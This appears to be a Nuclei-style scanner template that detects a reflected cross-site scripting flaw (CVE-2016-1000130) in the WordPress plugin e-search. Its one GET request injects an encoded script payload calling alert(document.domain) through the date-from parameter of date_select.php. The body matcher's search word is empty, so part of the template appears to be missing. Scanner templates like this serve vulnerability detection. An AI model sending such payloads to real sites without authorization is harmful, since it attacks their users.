id: CVE-2016-1000130 info: name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php author: daffainfo severity: medium description: Reflected XSS in wordpress plugin e-search v1.0 reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 - https://wordpress.org/plugins/e-search - http://www.vapidlabs.com/wp/wp_advisory.php?v=394 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000130 cwe-id: CWE-79 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200